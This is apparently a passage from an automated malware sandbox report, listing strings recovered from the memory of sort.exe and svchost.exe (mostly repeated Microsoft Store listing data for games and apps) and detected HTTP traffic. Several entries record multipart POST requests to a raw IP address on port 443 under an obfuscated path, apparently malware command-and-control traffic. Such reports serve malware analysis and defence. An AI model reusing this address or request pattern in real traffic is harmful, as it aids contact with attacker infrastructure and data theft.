Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: unknown HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
